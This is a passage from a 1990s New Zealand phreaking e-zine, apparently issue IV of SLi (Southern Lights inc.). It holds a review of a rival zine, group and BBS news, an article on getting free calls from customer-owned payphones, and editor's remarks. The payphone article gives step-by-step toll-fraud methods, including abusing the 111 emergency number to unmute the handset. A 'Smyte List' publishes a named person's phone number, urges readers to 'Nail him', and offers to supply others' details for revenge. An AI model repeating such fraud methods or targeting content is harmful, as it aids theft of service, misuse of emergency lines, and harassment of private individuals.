people/kids around who will try ANYthing for the sheer sake of it. Other
than the use of the cat in the article, there isn't too much more I'd comment
on. Interesting mixture - could be useful...... somewhere.. =)
[Article Twenty-Three: 10 Metre Cigarette Lighter]
The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient
idea created 'decades' ago. As for the petrol soaked rags, I don't think
there are many people who are planning on trying to KILL the 'victim' - at
least I'd like to think not.
[Article Twenty-Four: Exploding Rockz]
Could be sore. How do you feel about 'hail'? =)
[Article Twenty-Five: How to Cure a Hangover]
Interesting tips. I'll keep them in mind if I need them!
Oh, another tip for how to cure a hangover - so I was informed - just eat a
lemon. I know it would surely bring ME down to earth pretty quickly!
[Article Twenty-Six: Coca-Cola Recipe]
Is it really worth the trouble when, in some places, you can get 500ml
worth for a single dollar? What if you stuff up? You end up with a large
amount of worthless goo - mind you, you could try selling it to the city
council to use as TAR. *grin*
[Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would
be a LOT harder to find at the local supermarket.]
[Article Twenty-Seven: Voodoo Magic]
Each to one's own. If you believe it, go for it, I guess.
[Article Twenty-Eight: Excusez for Missing Class]
Lacked information on the consequences of truancy, and take it from someone
who's knowledgeable of these acts. It's just not worth it. As for the cheat-
ing in exams - What if you're caught? You may as well forget about getting
a job you'll enjoy - you'll be stuck with cleaning floors and packing
burgers, fries and Coke. Sounds fun, don't it?
[Editor's Note: Or making Coke!]
[Article Twenty-Nine: Greetz and Msgz to Contactz]
The title says it all... Couldn't find anything wrong with it. =)
[Article Thirty: ToT - The Future?]
Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would
come to that, but just to be on the safe side... *manical grin* *wink*
[Article Thirty-One: Last Wordz]
Normally skipped by the reader, but worth a read anyway.
[FINAL ANALISYS]
Some of the ideas expressed in 'ToT#2' had already been 'spread about'
prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't
have made much impact - especially if a lot of people know about them
already. If anything, it's a waste of disk space (j/k!). Some of the art-
icles, I found rather childish and others a little dangerous - not to mention
a lack of warnings which was one of my main concerns (it was something we'd
also forgot about in our previous mags, but you wise up after chats with
Telecom/other authorities!).
As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come
across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine
on the whole was 'nice light reading' seeming that the articles are, on
average, between a third of a page and a page, in length. Not a bad try
for a local Wellington H/P/A group really seeming that they had at least
SOMEthing to say. If you've got a small attention span, and are new to the
H/P/A scene, then this is the magazine for you.
I found it to be of no practical use to me, but it may do for you - it depends
on WHAT you're actually looking for. You don't have to take my word for it -
Why not just grab a copy and read it for y'self?
Finally, I'd just like to say - Quality, not Quantity is the key to success
with a good magazine. Maybe if the editor was interested less in the latter,
and more in the prior, it may show promise.
Many electronic magazines don't start out the best - due to lack of organ-
isation - but they normally get sorted out by about their third issue if
you're really serious about it.
[NOTES]
We, at SLi, welcome ANY comments at all and thoughts of setting up a
'Letters to the Editors' section in the magazine are in the process of being
thought over. Letters will, or will not, be printed depending on whether
it's wanted or not - in respective order.
We can be reached at:
NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us
at _ANY_ of our previous e-mail addresses.
This email address works at the time of publication:
hacker_m@ix.wcc.govt.nz
Snail Mail:
SLi
PO Box 3030
Onekawa
Napier
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ SLi ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
In this part of the mag, WE [the guys and gals of SLi] tell ya what the group
is doing.
WHAT IS SLi? and WHAT WE STAND FOR:
Freedom and the right to publish our views and the RIGHT to TEACH _YOU_
what we know. Read the article "Honour" if you want to see what rules
we TRY to live by.
Members resigned by choice from SLi:
Digital Omega -- Quit due to personal reasons.
Telco: Well CyntaxEra's "misuse of a telephone" ooops has sorted
itself out...
BBS: Is finally UP AND running, but VERY private. It's located in
Wellington, New Zealand.
Email hacker_m@ix.wcc.govt.nz for information on the number and
other miscellaneous info.
OFFICIAL SLi BBS's
~~~~~~~~~~~~~~~~~~
(ie. run by SLi MEMBERS)
BBS NAME MEMBER PHONE NUMBER/S SPEED MODEM
Hacker's Haven BBS Thorium +64-6-844-DATA(+646 844 3282) 28.8k BPS *
SLi BBS Eon +64-4-475-SCAN(+644 475 XXXX) 14.4k BPS !?
* = Only online sometimes.
! = No K0d3z kiddies and NO Warez Puppies!! :)
? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V
files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ COCOT Phreaking ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
COCOT Phreaking
~~~~~~~~~~~~~~~
For those of you who are reading this article without any previous knowledge
of the common everyday COCOT, I'll begin by giving you a brief outline of this
wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack
here]
C ustomer
O wned
C oin
O perated
T elephone.
There. Nothing to it. It's one of those small telephones you find in the old
shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin
Phone' within a 3-metre radius, the chances of there being one around greatly
decreases - or your handy service station. In the case of the latter suggest-
ion, there'll almost always be an attendant keeping an eye out on you, but if
they're slightly busy, they'll most probably be keeping there eyes out for
other things.
[Note: Telecom does know of the shortfalls of these fones, and warns their
"clients" of the problems these fones have. So the attendants MIGHT
know what's wrong with his/her fone and keep an eye out.]
In the following, I'll just go over my 'observations' of these fones, and at-
tempt to explain a bit about how they work - well, as far as I'm aware of, any-
way.
[Note: Considering the fact that New Zealand doesn't have the same 'Freedom of
Speech' Act, as there is in the States, I'm a little wary of writing
this article, so I'll try and keep the ideas to a minimum - that's all
they are... ideas.]
[Type One]
Description: 'Blue-Buttoned Telephone'.
[NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone,
but, if you are trying 'Idea Two', you must use the particular type
which is listed below.]
LCD Display shows a blinking 'COIN' which takes up the entire LCD display.
When dialling, it doesn't bring up the number onto the display, but you
SHOULD be able to hear it dialling.
Major Colours: Blue, white, grey and black.
[Idea One]
Get a pin. Dial the number you want to call, push the pin through the wire,
running from the fone into the wall, so it shorts the wires together thus
making it impossible for the fone to disconnect. Hang up the fone and pick
it back up. Dial '111' and pull the pin out. There you go - a free call.
[Idea Two]
Pick up the receiver and dial the number you want - as though you would nor-
mally. It should dial the number for you, and if the line isn't busy, you
should be put through okay. Once the person answers, dial '111' and it should
free you from the mute - allowing you to speak freely with the person you have
just called. If you get a 'no-such-number' answer, then perhaps there is a
toll-bar on the phone line of the COCOT, otherwise, try another COCOT.
[Explanation]
With these 'blue-buttoned fones', you get your dial-tone and you're even per-
mitted to use the keypad. The only problem... the microphone. The micro-
phone is muted to stop the person from using the telephone and (from what I'm
aware of) can only be 'de-muted' by the user of the telephone inserting a
coin, OR dialling '111' [the emergency phone number in NZ - for those of you
who are unfamiliar with the number].
After the numbers '111' are dialled - regardless of wether the phone has a
dial-tone, or not - the microphone loses the 'mute button', and allows the
user of the fone to speak into the microphone whilst allowing the receiver
of the call to hear the caller. Of course, the receiver of the phone is un-
changed, which allows the caller to hear the recipient of the call, to allow
the caller to hear the dial-tone.
[Type Two]
Description: 'Brown-Buttoned Telephone'
[NOTE: They have a big orange button with an 'A' on it.]
These fones are becoming less common, but are still around. They have been
replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add-
ed especially to help us fone phreaks out (NOT!). A few times, I have come
across the odd one or two which have an interrupted dial-tone - a fake one
which sticks around until you drop your dandy coin into the coin slot.
Major Colours: Brown, orange, white and traces of black.
[Idea One]
Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned
telephone'. Just put the dialler's microphone up to the UN-MUTED microphone
on the telephone's receiver, and dial away. Once the person answers, begin to
talk. =)
[Explanation]
The coin's only use appears to be to give the caller access to the dialling
pad. Well, the older versions seem to give that appearance - seeming that
there are newer versions hanging about with similar problems (ie. the false
dial-tone). The outer casing (the telephone case) is the same and the only
way to tell the difference is to try things out for yourself. This is a case
of just hoping that you're lucky enough to find the ones which work.
[Type Three]
Description: 'The Red Phone'
These are these rather big, rather OLD, rather chunky, rather, err, well,
RED fones. they have a little red button on them that automatically dials
'111'.
Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for
the numbers.
[Idea One]
The keypad is the only thing not connected so the ol' DTMF trick will work
fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of
you who don't know that already]. Simple, aint it?
[Idea Two]
I assume you can also pulse dial using the switch-hook.
For those who don't know how to use pulse-dialling, just tap the switch-hook
down for a 'split-second' the number of times you need to dial the number with
a space of silence between each number (so it knows when the next number is
being dialled). It is a VERY old trick, but I thought I'd add it for those
interested.
[NOTE: These apply to NZ, but I can't remember what they are everywhere else
and plus, I'm not going to type down ALL of the respective numbers!]
Phone Number Number of times
to press s-h
0 - 10
1 - 9
2 - 8
3 - 7
4 - 6
5 - 5
6 - 4
7 - 3
8 - 2
9 - 1
ie. Say you want to dial, 001-202-542-873, you would do this:
tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause,
8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7.
An easy way of remembering it, is to simply add the number to the amount of
taps of the switch-hook and it should equal 10.
This is an old idea, but it works on these old phones.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Smyte List ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, as in all other SLi mags - except #1 - here's a person [and
his info] who has done a pretty stupid thing, and got the members of
SLi pissed at him.
Name Info Reason
--------------------+-------------------------+------------------------------
Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to
aka [-=[THE_FLY]=-] mention a LOT of other ppl.
[Eon's note: This guy insulted
Cyntax and I. He DESERVES
ALL he GETS. Nail him.]
[Note: If you have someone who has pissed you off lately, you want to 'get in
touch' with them and think that we MIGHT have their info, just giz us
a bell with your reason for getting back at this person and we'll see
what we can do for ya.]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Editors Knotez ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Damn it! Yet another one of these things! :)
Ahh, well, me and Cyntax 'ave given up dak,
Oh, yeah - Happy April Fools! :=)
Well, it's the end of another SLi mag. Guess it's getting rather predict-
able now.
Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you
want the number and instructions to login including the bbs passwd and
stuff. Oh, BTW, it's 14.4... :)
ALSO!!! if you want to send us a note, post it to our PO BOX.
Here is the shout out you wanted MysTix!
PS. SLi V should be out in 3-4 months.
Yeah someone wrote me asking if there was a way to turn off call waiting.
Now, I think it's *52.
Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security)
isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone
wanna write me a letter? I'm sure you can find my address :\ I take that
back. I'll just say, "tnx Heather" :-<
[Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her
VMB "ooops". So be it.]
God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has!
And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black
rectangles! Of course this is MY opinion and may not be that of the
civilized world
[CyntaxEra's Note: Apologies go out to any people reading this who have that
tie - we're very sorry for you. ;)]
Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and
512 on our misc stuff - thanks to PGP 2.4x <not the new one, 'cause the US
Government have indorced it>.
Any BBS's that would like to become an OFFICIAL SLi release point, please
POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.
A Final NOTE:
We are ALL New Zealanders - not black, not white but united under ONE
flag. We are one nation. May we once again become one people.
Our flag is the symbol of our country, to all who spit on it, to all who
stomp on it. Take note that thousands died for that flag - both white and
black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we
are ONE people united. If you wish to show your disaproval, do it in a
rightous and honourable way. Not in such a childish and immature way
without any fore-thought at all.
[This is in accordance to the current disagreements between NZ and a small
percentage of Maori New Zealanders in reference to this year's Waitangi Day -
A day which should have been celebrated by all. Sadly the acts of a few have
made this country two people under one divided flag. Be ashamed of yourself
all who took part in the division of New Zealand, for these acts will live in
the history of New Zealand forever as the day New Zealanders became two
peoples.]
Well, I'll see you all 'round... 'Till next time...
.
Life is Cursed.
For all who live must die.
eof